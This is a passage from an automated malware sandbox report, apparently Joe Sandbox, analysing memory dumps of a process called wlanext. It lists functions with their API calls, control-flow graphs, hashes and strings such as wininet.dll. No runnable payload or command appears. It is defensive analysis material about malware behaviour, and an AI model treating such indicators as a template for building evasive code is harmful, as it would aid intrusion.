                                            • Instruction Fuzzy Hash: DCF0F9B6204148ABCB04DF98DC90CEB77ADEF8D714B15878DFE5D93202C634E8558BA0
                                            Function 00BCA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BB2D11,00002000,00003000,00000004), ref: 00BCA579
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 0abb1b27005fbba543d2f5f2523a62e42a53629ce2f19e2ca0aeb1575e85b42e
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: E6F015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE0897241C630F810CBA0
                                            Function 00BCA53D Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BB2D11,00002000,00003000,00000004), ref: 00BCA579
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 2bae9cc8795b84b4f01bbf9fc915de301d9b2a4616306d955e925d231791027a
                                            • Instruction ID: 2dec63a0caeceaea1512e553f5d3bf2762e0b7231193f6b9e20243744c40f5bb
                                            • Opcode Fuzzy Hash: 2bae9cc8795b84b4f01bbf9fc915de301d9b2a4616306d955e925d231791027a
                                            • Instruction Fuzzy Hash: BDF030F1100149ABCB15DF58DC84CA7B7ACFF88624B15C65DF95997206C630E815CBB0
                                            Function 00BCA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00BC4D50,?,?,00BC4D50,00000000,FFFFFFFF), ref: 00BCA4B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 57422b7f2b4154bd6f100dcf3cdc9c1404cd9ebd74c3ec13c363f81f15a90f00
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: B5D012752002186BD710EB98CC45F97779CEF44B54F154499BA189B242C530F50086E0
                                            Function 03632B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 64fbfe168c73389aeb2b904787c79d79102db81e88ccd0fe9e44e855b1451c28
                                            • Instruction ID: 1f996a9072cc126d1f4022aa3b60f3f45f9557467cbd6498eead2a22fd72bfb9
                                            • Opcode Fuzzy Hash: 64fbfe168c73389aeb2b904787c79d79102db81e88ccd0fe9e44e855b1451c28
                                            • Instruction Fuzzy Hash: 69900261602404034205B5584414616400A87E0201B55C021E1014690EC6A689D16225
                                            Function 03632BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e41c117d5e355f6c19d8b32cc8b4a9ea9feb1a7e6a7565e146c74232c9944e18
                                            • Instruction ID: 0fac6ea397e610e690b72c70595dfe3d7fab19a71d1f53e0464b89ecaf78ee51
                                            • Opcode Fuzzy Hash: e41c117d5e355f6c19d8b32cc8b4a9ea9feb1a7e6a7565e146c74232c9944e18
                                            • Instruction Fuzzy Hash: D690023160544C42D240B5584404A46001587D0305F55C011A0064794E97A68E95B761
                                            Function 03632BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd9d6c8e683b54d175816a4ddf4c8ce95cced546f0af116296f96aad4a5c84ea
                                            • Instruction ID: c71ece9771740dd2e9a3bb8926b7c80c4b0be8f79aaf4988b84f91f888158a9f
                                            • Opcode Fuzzy Hash: cd9d6c8e683b54d175816a4ddf4c8ce95cced546f0af116296f96aad4a5c84ea
                                            • Instruction Fuzzy Hash: 6090023160140C02D280B558440464A000587D1301F95C015A0025754ECB968B9977A1
                                            Function 03632AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ddf2e6aea19755c259f7738094993adddf1e88047ef9e56dca5d10a717d000d8
                                            • Instruction ID: 0bb454e08dfb936cda87ae599f50466870ad673e2f5784717866a9222697e7ad
                                            • Opcode Fuzzy Hash: ddf2e6aea19755c259f7738094993adddf1e88047ef9e56dca5d10a717d000d8
                                            • Instruction Fuzzy Hash: 27900225611404030205F9580704507004687D5351355C021F1015650DD7A289A15221
                                            Function 03632F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e78495a9c0b16810ecd4527405e7c9653f5ff1e3ef7eaf91a26416dd3bda6130
                                            • Instruction ID: a472fa7948674a03eb56686c31c41de6a1e8a80a365b2c0748dd17183ad85e11
                                            • Opcode Fuzzy Hash: e78495a9c0b16810ecd4527405e7c9653f5ff1e3ef7eaf91a26416dd3bda6130
                                            • Instruction Fuzzy Hash: 0F90026174140842D200B5584414B060005C7E1301F55C015E1064654E879ACD926226
                                            Function 03632FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc02d915471caa388e601cb28cbf3692964dac64384109c81100471adbef7a78
                                            • Instruction ID: 6ff84dad5c642f397a0561702b5bf4428ac20e52feded2a6eddf3e3c293776b9
                                            • Opcode Fuzzy Hash: cc02d915471caa388e601cb28cbf3692964dac64384109c81100471adbef7a78
                                            • Instruction Fuzzy Hash: E1900221611C0442D300B9684C14B07000587D0303F55C115A0154654DCA9689A15621
                                            Function 03632EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 75621fb3704b6f7f3dd738d58b9644e5c6cb95dd30cadb6be3e62b38e3b6ce40
                                            • Instruction ID: e05fc7d01550ad0dda6147089f0c84f2b7cdc9f8a14a780455b90bd719a7de4b
                                            • Opcode Fuzzy Hash: 75621fb3704b6f7f3dd738d58b9644e5c6cb95dd30cadb6be3e62b38e3b6ce40
                                            • Instruction Fuzzy Hash: 7C90027160140802D240B5584404746000587D0301F55C011A5064654F87DA8ED56765
                                            Function 03632D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f3a9e83550f631fc36b4fc1b454e75eb3eb36482898c664fe6b2f44d0a116287
                                            • Instruction ID: 16d138a50ee23bd0a870a80c1aaeababdc574ca3f7b71bbfa6982d198198e01a
                                            • Opcode Fuzzy Hash: f3a9e83550f631fc36b4fc1b454e75eb3eb36482898c664fe6b2f44d0a116287
                                            • Instruction Fuzzy Hash: DA90022961340402D280B558540860A000587D1202F95D415A0015658DCA9689A95321
                                            Function 03632DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9d34c0a8ab14b144511730219cb55415b7d4bd6c230f1bd9cf9e39ef97414114
                                            • Instruction ID: 023637096a42b954ff95910a81044cd9480dc66ff90cca61fc89a78e3a37e392
                                            • Opcode Fuzzy Hash: 9d34c0a8ab14b144511730219cb55415b7d4bd6c230f1bd9cf9e39ef97414114
                                            • Instruction Fuzzy Hash: BB90023160140813D211B5584504707000987D0241F95C412A0424658E97D78A92A221
                                            Function 03632DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7eb4b257da1fccd3dc0f0f56b8f9559c7c00a82618618115bea0da9cda448ed1
                                            • Instruction ID: 036074b349fc3c3b59fa8f06916827ee44c827f849a379fcd1f8b9b4473a2e79
                                            • Opcode Fuzzy Hash: 7eb4b257da1fccd3dc0f0f56b8f9559c7c00a82618618115bea0da9cda448ed1
                                            • Instruction Fuzzy Hash: EB900221642445525645F5584404507400697E0241795C012A1414A50D86A79996D721
                                            Function 03632C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a76f927472989f0b5fca75ba6742d619a9fd8c755573c25a34df32be4078aab2
                                            • Instruction ID: 07d00e57614759ab77dd481c32f7a086d6f339f5a58ae5b4594cdea09528b958
                                            • Opcode Fuzzy Hash: a76f927472989f0b5fca75ba6742d619a9fd8c755573c25a34df32be4078aab2
                                            • Instruction Fuzzy Hash: 0090023160140C42D200B5584404B46000587E0301F55C016A0124754E8796C9917621
                                            Function 03632C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9c10346d7505e561aacf40d168ac79f257027e7221a913aec46f2202a8b2e39f
                                            • Instruction ID: d569d4c6b042d6e678d6c61268906a1444e4cc0adae5767e8f34424260927e0d
                                            • Opcode Fuzzy Hash: 9c10346d7505e561aacf40d168ac79f257027e7221a913aec46f2202a8b2e39f
                                            • Instruction Fuzzy Hash: D190023160148C02D210B558840474A000587D0301F59C411A4424758E87D689D17221
                                            Function 03632CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7807ccb2a47b1f15b9bd4d788d8398507a93d118322e2e48e04e4f47cb7b6a62
                                            • Instruction ID: 60a24b9c60db845888ca7b6afc3b4a7eeaa645241152a577bda2f529d3cb2ae8
                                            • Opcode Fuzzy Hash: 7807ccb2a47b1f15b9bd4d788d8398507a93d118322e2e48e04e4f47cb7b6a62
                                            • Instruction Fuzzy Hash: A690023160140802D200B9985408646000587E0301F55D011A5024655FC7E689D16231
                                            Function 036335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bb5557f1288b8fe8dbe5d477d5c5552e2a5a6e9d2f35b918db5fb178a101520b
                                            • Instruction ID: dc1024ff0530b69ad238b66fed25a16e700b453d359498f6df6185636382494c
                                            • Opcode Fuzzy Hash: bb5557f1288b8fe8dbe5d477d5c5552e2a5a6e9d2f35b918db5fb178a101520b
                                            • Instruction Fuzzy Hash: F3900231A0550802D200B5584514706100587D0201F65C411A0424668E87D68A9166A2
                                            Function 00BC9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 403 bc9080-bc90c2 call bcbd40 406 bc919c-bc91a2 403->406 407 bc90c8-bc9118 call bcbe10 call bbacf0 call bc4e50 403->407 414 bc9120-bc9131 Sleep 407->414 415 bc9196-bc919a 414->415 416 bc9133-bc9139 414->416 415->406 415->414 417 bc913b-bc9161 call bc8ca0 416->417 418 bc9163-bc9184 call bc8eb0 416->418 422 bc9189-bc918c 417->422 418->422 422->415
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00BC9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                            • Instruction ID: 5a20c1357e03253d779843e330b7a085b23b470e9efb13d94e73adcb6aa99c2d
                                            • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                            • Instruction Fuzzy Hash: 1A3181B2500645BBD724DF64C88AFA7B7F8EB48B00F14815DF62A6B245D630A650CBA4
                                            Function 00BC9077 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 423 bc9077-bc90c2 call bcbd40 427 bc919c-bc91a2 423->427 428 bc90c8-bc9118 call bcbe10 call bbacf0 call bc4e50 423->428 435 bc9120-bc9131 Sleep 428->435 436 bc9196-bc919a 435->436 437 bc9133-bc9139 435->437 436->427 436->435 438 bc913b-bc9161 call bc8ca0 437->438 439 bc9163-bc9184 call bc8eb0 437->439 443 bc9189-bc918c 438->443 439->443 443->436
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00BC9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 5bc0b5ee1b3b7496bb807e7fa570194f926fa46edc09aaba532142f143b43025
                                            • Instruction ID: 4552fb0f8ca3f7e827b0a1d84fb8f05e300f399b6c5e4f3c6f980301aa828ef0
                                            • Opcode Fuzzy Hash: 5bc0b5ee1b3b7496bb807e7fa570194f926fa46edc09aaba532142f143b43025
                                            • Instruction Fuzzy Hash: 0F2191B2900605BBD714EF64CC8AFABB7F8EB48B00F14805DF6296B245D774A550CBA4
                                            Function 00BCA662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 550 bca662-bca687 call bcaf60 553 bca68c-bca6a1 RtlFreeHeap 550->553
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BB3AF8), ref: 00BCA69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 46abaa2b41f995f3e336365dc9b2631254c0e5bca6a241af43bde1f4508b1499
                                            • Instruction ID: 7e40df541e1d29bc8b62faa61e108b44ce0dde701cc2582954a36ed6a48d6b41
                                            • Opcode Fuzzy Hash: 46abaa2b41f995f3e336365dc9b2631254c0e5bca6a241af43bde1f4508b1499
                                            • Instruction Fuzzy Hash: 30F05E725002086FD724DF94DD84ED7776DEF44754F154598FA096B145D630B805CBE0
                                            Function 00BCA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 554 bca670-bca6a1 call bcaf60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00BB3AF8), ref: 00BCA69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 6ae8b15cff0dd0fe00d0f1df583d79a857b76ebb84bd5cd8e81cdf27a30670ff
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 1DE04FB12002086BD714DF59CC45EA777ACEF88754F118558FD0857241C630F910CAF0
                                            Function 00BB8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00BB836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00BB838B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction ID: 3b8ca6f2529ce72748390ce6b334db714a79c1408b3999688dbae31e08dd9b46
                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                            • Instruction Fuzzy Hash: 5D01DB31A8022D77E720A6949C43FFE77AC9B40F50F050198FF04BA1C1EAD4690647F6
                                            Function 00BB8393 Relevance: 3.0, APIs: 2, Instructions: 30threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 572 bb8393-bb839d 573 bb839f 572->573 574 bb8361-bb836e PostThreadMessageW 572->574 575 bb838d-bb8392 574->575 576 bb8370-bb838b call bba480 PostThreadMessageW 574->576 576->575
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00BB836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00BB838B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 17c13fc77dd402e97c30cc5c41d4b20e8594a53422bc50813f80961310563cbe
                                            • Instruction ID: 1404648495179b48b0eb269eef7d9013fdb881c753596e1073bd5ec722ef0c00
                                            • Opcode Fuzzy Hash: 17c13fc77dd402e97c30cc5c41d4b20e8594a53422bc50813f80961310563cbe
